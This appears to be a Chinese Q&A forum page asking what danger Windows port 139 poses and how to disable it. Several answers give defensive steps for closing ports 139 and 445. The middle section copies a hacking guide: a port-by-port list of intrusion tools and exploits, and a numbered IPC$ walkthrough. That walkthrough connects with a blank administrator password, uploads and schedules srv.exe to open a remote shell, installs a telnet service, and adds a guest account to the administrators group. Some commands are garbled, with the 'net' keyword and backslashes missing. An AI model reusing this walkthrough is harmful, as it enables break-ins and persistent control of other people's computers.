139端口139端口有什么危害~怎么禁用139 追加30分的高分~~~

139端口入侵

我查拉135端口端口说明：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码；使用DCOM可以通过网络直接进行通信，能够跨包括HTTP协议在内的多种网络传输。

端口漏洞：相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒，该病毒就是利用RPC漏洞来攻击计算机的。

RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞，该漏洞是由于错误地处理格式不正确的消息造成的。

该漏洞会影响到RPC与DCOM之间的一个接口，该接口侦听的端口就是135。

1：用139端口入侵 我们先确定一台存在139端口漏洞的主机。

用扫描工具扫描！比如SUPERSCAN这个端口扫描工具。

假设现在我们已经得到一台存在139端口漏洞的主机，我们要使用nbtstat -a IP这个命令得到用户的情况！现在我们要做的是与对方计算机进行共享资源的连接。

用到两个NET命令，下面就是这两个命令的使用方法 NET VIEW? 作 用：显示域列表、计算机列表或指定计算机的共享资源列表。

? 命令格式 view [putername | /domain[:domainname]]? 参数介绍：? <1>键入不带参数 view显示当前域的计算机列表。

? <2>putername 指定要查看其共享资源的计算机。

? <3>/domain[:domainname]指定要查看其可用计算机的域? NET USE? 作用：连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。

? 命令格式 use [devicename | *] [puternamesharename[volume]]? [password | *]] [/user:[domainname]username] [[/delete] |? [/persistent:{yes | no}]]? 参数介绍：? 键入不带参数 use列出网络连接。

? devicename指定要连接到的资源名称或要断开的设备名称。

? puternamesharename服务器及共享资源的名称。

? password访问共享资源的密码。

? *提示键入密码。

/user指定进行连接的另外一个用户。

? domainname指定另一个域。

? username指定登录的用户名。

? /home将用户连接到其宿主目录? /delete取消指定网络连接。

? /persistent控制永久网络连接的使用。

? C: use \IP C: view \IP 我们已经看到对方共享了他的C，D，E三个盘 我们要做的是使用NBTSTAT命令载入NBT快取. c:>nbtstat –R 载入NBT快取 c:>nbtstat –c 看有无载入NBT快取 现在我们已经得到的139端口漏洞的主机IP地址和用户名，现在就该是我们进入他计算的时候了，点击开始---查找--计算机，将刚才找到的主机名字输入到上面，选择查找，就可以找到这台电脑了！双击就可以进入，其使用的方法和网上领居的一样。

2：4899端口入侵 用4899过滤器.exe，扫描空口令的机器 3：80入侵 对sp3以前的机器，可以用webdav入侵； 对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe） 可以利用SQL进行注入。

（啊D的注入软件）。

4：serv-u入侵(21端口） 对5. 004及以下系统，可用溢出入侵。

（serv5004.exe） 对5.1.0.0及以下系统，可用本地提升权限。

（servlocal.exe） 对serv-u的MD5加密密码，可以用字典暴破。

（crack.vbs） 输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码 5： 554端口 用real554.exe入侵。

6：6129端口 用DameWare6129.exe入侵。

7. 6129端口 用DameWare6129.exe入侵。

8. 系统漏洞 利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞， 进行溢出入侵。

9. 3127等端口 可以利用doom病毒开的端口，用nodoom.exe入侵。

（可用mydoomscan.exe查）。

10. 其他入侵 利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。

经典IPC$入侵 1. C:& use \127.0.0.1IPC$ "" /user:"admintitrators" 这是用"流光"扫到的用户名是administrators，密码为"空"的IP地址(气好到家如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连 接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名 ，输入administrators，命令即可成功完成。

2. C:>copy srv.exe \127.0.0.1admin$ 先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的 c:winntsystem32，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:& time \127.0.0.1 查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:>at \127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊. 5. C:& time \127.0.0.1 再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备 开始下面的命令。

6. C:> 127.0.0.1 99 这里会用到命令吧，注意端口是99。

默认的是23端口，但是我们使用的 是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打 算建立一个服务！这就要用到ntlm了 7.C:>copy ntlm.exe \127.0.0.1admin$ 用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:WINNTsystem32>ntlm 输入ntlm启动（这里的C:WINNTsystem32>指的是对方计算机，运行ntlm其实是让这 个程序在对方计算机上运行）。

当出现"DONE"的时候，就说明已经启动正常。

然后使 用& start "来开启服务！ 9. 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作 一样简单！(然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把guest激活加到管理组 10. C:& user guest /active:yes 将对方的Guest用户激活 11. C:& user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:& localgroup administrators guest /add 将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我 们可以用guest再次访问这台计算机) /p?w=各个端口的入侵.%20&k=5lala&aid=B0100019074 QQ群:28484721

关闭139端口可以吗

关闭139端口 打开“网络连接”，鼠标右键单击“本地连接”，选择“属性”，打开“常规”的“协议(TCP/IP)”属性设置界面，并在对应的标签页面中，单击“高级”按钮，弹出高级设置窗口。

选中该窗口中“WINS”标签，在下面“NetBIOS设置”选择“TCP/IP上的NetBIOS设置”，确定后退出。

“本地连接”右键菜单的“属性”命令，把弹出的界面中，取消“Microsoft网络的文件和打印机共享”选项。

由于关掉了139端口系统会自动打开445端口代替139端口 所以还要关掉445 关闭445端口 依次单击“开始” | “运行”命令，在随后出现的运行框中，输入“regedit”命令，打开一个注册表编辑器界面。

依次单击“HKEY_LOCAL_MACHINESYSTEMCurrent- ControlSetServicesNetBTParameters”子键，在右边的子窗口中，用鼠标右键单击一下空白区域，从弹出的快捷菜单中，依次执行“新建” | “双字节值”(或者是DWORD 值）命令，并将该值命名为“SMBDeviceEnabled”。

双击“SMBDeviceEnabled”选项，在弹出的数值设置界面中，将其数值设置为“0”。

关闭注册表编辑界面，将系统重新启动，445服务端口就会被彻底关闭了。

139是个什么样的端口?需要开放吗?

每一项服务都对应相应的端口，比如众如周知的WWW服务的端口是80，smtp是25，ftp是21，win2000安装中默认的都是这些服务开启的。

对于个人用户来说确实没有必要，关掉端口也就是关闭无用的服务。

“控制面板”的“管理工具”中的“服务”中来配置。

139端口是NetBIOS Session端口，用来文件和打印共享，注意的是运行samba的unix机器也开放了139端口，功能一样。

以前流光2000用来判断对方主机类型不太准确，估计就是139端口开放既认为是NT机。

关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“协议(TCP/IP)”属性，进入“高级TCP/IP设置”“WINS设置”里面有一项“禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。

对于个人用户来说，可以在各项服务属性设置中设为“禁用”，以免下次重启服务也重新启动，端口也开放了。

139端口有什么危害~怎么禁用139 追加30分的高分~~~

危害：通过139端口入侵是网络攻击中常见的一种攻击手段，一般情况下139端口开启是由于NetBIOS网络协议的使用。

NetBIOS即网络基本输入输出系统，系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址，从而实现信息通讯。

在局域网内部使用NetBIOS协议可以非常方便地实现消息通信，但是如果在上，NetBIOS就相当于一个后门程序，很多攻击者都是通过NetBIOS漏洞发起攻击。

关闭：在控制面板上点击管理工具-本地安全策略,右击"IP安全策略,在本地计算机"选择"管理IP筛选器表和筛选器操作",点添加,在对话框里填,随便写.只要你记得住.最好还是写"禁用139端口"比较看的懂.点右边的添加->下一步->源地址为"任何地址"->目的地址"我的地址"->协仪为TCP->在到此端口里填"139"就可以. 还有一个办法就是TCP/IP协仪里禁用NETBIOS.